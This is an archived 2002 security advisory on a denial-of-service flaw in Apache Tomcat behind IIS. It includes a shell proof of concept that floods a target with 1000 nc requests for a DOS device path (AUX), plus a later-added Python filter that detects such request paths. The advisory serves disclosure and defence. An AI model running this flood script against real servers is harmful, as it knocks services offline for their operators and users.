-----BEGIN PGP SIGNED MESSAGE-----

<Title:>
Apache Tomcat: Remote denial-of-service vulnerability

<Date:>
2002-09-06

<State:>
2002-10-11

<Vendor response:>
Vendor contacted on 2002-09-06. Vendor has been verifying the problem since 2002-09-10. No news since then.

<Operating Systems:>
Microsoft Windows 2000
Microsoft Windows NT may be affected as well.

<Software:>
Apache Tomcat 3.3
Apache Tomcat 4.0.4
All versions prior to 4.1.x may be affected as well.
Apache Tomcat 4.1.10 (and probably higher) is not affected.

<Attack:>
A remote attacker can bring the servlet engine to a standstill.

<Description:>
In combination with Microsoft's IIS, Apache Tomcat is vulnerable to a denial-of-service attack. An attacker can crash the Tomcat engine with multiple (e.g. 1000) requests whose path contains a DOS device name such as AUX, LPT1, CON or PRN.

Proof of concept code:
When Tomcat is serving servlets and JSPs under /examples/servlet/, use:

- - - --------8<----------------------------
#!/bin/sh
# Fire 1000 concurrent requests for the reserved device name AUX
# at the IIS front end. Replace <target_ip> and <target-port>.
for i in 1 2 3 4 5 6 7 8 9 0 ; do
  for j in 1 2 3 4 5 6 7 8 9 0 ; do
    for k in 1 2 3 4 5 6 7 8 9 0 ; do
      # discard both stdout and stderr of each nc, run it in the background
      echo -e "GET /examples/servlet/AUX HTTP/1.0\n\n" | nc <target_ip> <target-port> >/dev/null 2>&1 &
    done
  done
done
- - - --------8<----------------------------

This attack works on a Microsoft IIS web server connected to the Tomcat engine via the AJP 1.3 connector. Standalone Tomcat engines (reached via the HTTP connector on port 8080) are not vulnerable.

<Risk:>
Probability of an attack: HIGH
Damage probability: MEDIUM-HIGH

<Recommendation:>
1) Do not use Apache software on Microsoft operating systems.
2) When using Apache with IIS, enable the URLScan filter to reject HTTP requests containing DOS device names.
3) Update to Apache Tomcat 4.1.x

Author:
Olaf Schulz
olaf.schulz@t-systems.com
http://www.dcert.de

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.3

iQEVAwUBPaanhhAj4oS8JNNNAQGAywgAgbNtMnf54MsqozQsxuJDfR2oU67qUXMf
dMbt7DuyxkRr8sS4+u6vmTvv3v/Da1IfiwlOZcvaRLh+r3+lO1nJUoUZeIVjWW8b
tat0uPKNRxA7b/DJpcQLkohewurDPQlyTV5dJqJpZp6Q8YzRAHIi1WqL4fnZAb6o
fMjIft7MVNs2y/CVpQmofdh4ZTmY0tPdifKIyhxdVBSCpgBES4dZwxX41j9PcHeK
YJpuxm+d6c0PsbbmY5S5BPPBKyg87mQcOHs2bN0JCaxwHoLiXx8zLCQBkhB1xAD7
0y4u8zMXNT5QVqaOeBig+GFackal6b0Qi+8XSDPZRpiJ8kvywz2maQ==
=+2dL
-----END PGP SIGNATURE-----
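The check that recommendation 2 asks the IIS-side filter to perform, written out as an added example; this is not code from the advisory, from Tomcat or from URLScan. It applies the Win32 reserved-name rule (only the segment's stem before the first dot counts, case-insensitively, after trailing dots and spaces are stripped), so AUX, aux.jsp and a percent-encoded CON are all caught, while an ordinary word such as "auxiliary" is not. The device-name set beyond the four names the advisory lists (NUL, COM1-COM9, LPT2-LPT9) and the sample request lines are assumptions constructed for the example, not captured traffic.

```python
from typing import List, Optional, Tuple
from urllib.parse import unquote, urlsplit

# Win32 reserved device names. The advisory names AUX, LPT1, CON and PRN; the
# remaining entries (NUL, COM1-COM9, LPT2-LPT9) follow the same Win32 rule and
# are an assumption of this example, not a claim from the advisory.
RESERVED_DEVICES = (
    {"CON", "PRN", "AUX", "NUL"}
    | {f"COM{n}" for n in range(1, 10)}
    | {f"LPT{n}" for n in range(1, 10)}
)


def reserved_device_in_path(path: str) -> Optional[str]:
    """Return the reserved device name hit by any segment of a URL path, else None.

    Win32 resolves a name to the device when its stem (the part before the first
    dot, trailing dots and spaces stripped, compared case-insensitively) is
    reserved, so "AUX", "aux.jsp", "Aux." and "AUX  " all name the AUX device.
    Percent-decoding happens first so "%43ON" is seen as "CON".
    """
    for segment in unquote(path).split("/"):
        stem = segment.split(".", 1)[0].rstrip(" .").upper()
        if stem in RESERVED_DEVICES:
            return stem
    return None


def request_path(request_line: str) -> str:
    """Extract the path from an HTTP request line such as
    'GET /examples/servlet/AUX HTTP/1.0' (query string and fragment dropped)."""
    parts = request_line.split()
    target = parts[1] if len(parts) >= 2 else ""
    return urlsplit(target).path


def scan_request_lines(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (1-based line number, device) for every request line whose
    path resolves to a reserved device name; these are the requests to reject
    before they reach the AJP connector."""
    hits = []
    for number, line in enumerate(lines, start=1):
        device = reserved_device_in_path(request_path(line))
        if device is not None:
            hits.append((number, device))
    return hits


def naive_sequence_hits(lines: List[str]) -> List[int]:
    """Plain substring matching, the way a bare URL-sequence denylist behaves:
    flags any decoded request path containing a device name anywhere, including
    inside ordinary words such as 'auxiliary'. Kept here to show the over-blocking."""
    flagged = []
    for number, line in enumerate(lines, start=1):
        upper = unquote(request_path(line)).upper()
        if any(name in upper for name in RESERVED_DEVICES):
            flagged.append(number)
    return flagged


# Constructed request lines (not captured traffic): the advisory's PoC request,
# two variants the device-name rule still catches, and two benign requests.
SAMPLE_REQUESTS = [
    "GET /examples/servlet/AUX HTTP/1.0",
    "GET /examples/jsp/lpt1.jsp HTTP/1.0",
    "GET /examples/servlet/%43ON?x=1 HTTP/1.0",
    "GET /examples/auxiliary/index.jsp HTTP/1.0",
    "GET /examples/servlet/HelloWorldExample HTTP/1.0",
]


if __name__ == "__main__":
    for number, device in scan_request_lines(SAMPLE_REQUESTS):
        print(f"line {number}: reject ({device}): {SAMPLE_REQUESTS[number - 1]}")
    print("naive substring filter would flag lines:", naive_sequence_hits(SAMPLE_REQUESTS))
```

On the sample input the stem rule rejects lines 1 to 3 only, while the substring variant also rejects line 4 (/examples/auxiliary/), which is the trade-off to keep in mind when a denylist of raw URL sequences is the only tool available in front of the AJP connector.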
This archive was generated by hypermail 2b30 : Fri Oct 11 2002 - 10:03:38 PDT